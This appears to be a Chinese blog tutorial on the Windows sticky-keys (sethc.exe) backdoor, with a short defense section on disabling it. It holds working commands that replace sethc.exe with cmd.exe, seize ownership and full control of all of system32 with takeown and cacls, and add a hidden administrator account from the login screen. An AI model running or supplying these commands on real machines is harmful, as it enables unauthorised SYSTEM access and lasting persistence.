zoukankan      html  css  js  c++  java
  • shift后门

    shift快捷

    Windows的粘滞键------C:windowssystem32sethc.exe,它本是为不方便按组合键的人设计的

    Windows系统按5下shift后,Windows就执行了system32下的sethc.exe,也就是启用了粘滞键

     在进程里可以看到是以当前用户的权限运行

    但是当我们未登陆系统(停留在登陆界面)的时候 系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序

    后门原理

    我们可以把cmd.exe这个程序更名称sethc.exe并且把原来的sethc.exe替换掉

    在登陆界面的时候我们连续按下5吃shift键系统以system权限就会运行我们的CMD.exe

    那么我们的cmd.exe就具有了管理员权限了 如此一来 我们只要利用CMD加一个管理员用户就可以登陆进去,实现隐藏后门

    后门制作

    其制作有很多种,下面介绍一种最简单的,可以明白其原理自己扩展

    在命令行执行(需要一定的权限)

    copy C:WINDOWSsystem32cmd.exe​ C:windowssystem32sethc.exe   //如果没指定生成的文件,会直接覆盖copy的第二个参数,相当于将第二个参数换成了第一个参数,但是文件外部名称没变
    

    发现拒绝访问

    出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令

    注销,尝试登陆界面直接运行出系统权限的cmd命令。

    takeown /f c:windowssystem32*.*   /a /r /d y
    cacls  c:windowssystem32*.*  /T /E /G administrators:F

    目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
    然后系统文件夹权限。

    如果提权后是system权限,需要在转化

    cacls  c:windowssystem32*.*  /T /E /G system:F

    现在可以用管理员权限访问了

    注销,来看下登陆界面是否可以5个shift调用起来shift后门

    通过命令添加为管理员登陆

    net user gkk test /add && net localgroup administrators gkk /add

    这个命令行存在时间限制,所以要快速输入命令,达到添加用户的目的。重启尝试登陆。

    防御

    禁用该功能

    C:windowssystem32sethc.exe

    C:windowssystem32dllcachesethc.exe

    (dllcache目录是隐藏的,在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作系统文件"的选择取消才能看得到)

    开始------->控制面板---->辅助功能选项------>设置----->取消快捷键

     

    使用权限来约束这两个文件

    就是让所有人用不了,而且直接删除sethc.exe文件,系统会自动找回

    1.删除所有组的权限

    右键属性,高级,有勾则去掉“允许父项的继承权限传播到该对象和所有子对象”的勾

     

    2.添加一个everyone组,然后设置该组的所有权限都是“拒绝”

    点击”添加“,在出现的选择用户和组中点击”立即查找“,在搜索结果中找到”Everoy“用户,并确定

    继续确定,将”Everoy“用户的权限设置为全部拒绝

    这样就禁止了安装和在此访问。当再次安装和访问时,就会出现拒绝访问

    学习文章:https://blog.csdn.net/auuuuuuuu/article/details/88902791

  • 相关阅读:
    JavaScript Patterns 5.7 Object Constants
    JavaScript Patterns 5.6 Static Members
    JavaScript Patterns 5.5 Sandbox Pattern
    JavaScript Patterns 5.4 Module Pattern
    JavaScript Patterns 5.3 Private Properties and Methods
    JavaScript Patterns 5.2 Declaring Dependencies
    JavaScript Patterns 5.1 Namespace Pattern
    JavaScript Patterns 4.10 Curry
    【Android】如何快速构建Android Demo
    【Android】如何实现ButterKnife
  • 原文地址:https://www.cnblogs.com/BOHB-yunying/p/11695140.html
Copyright © 2011-2022 走看看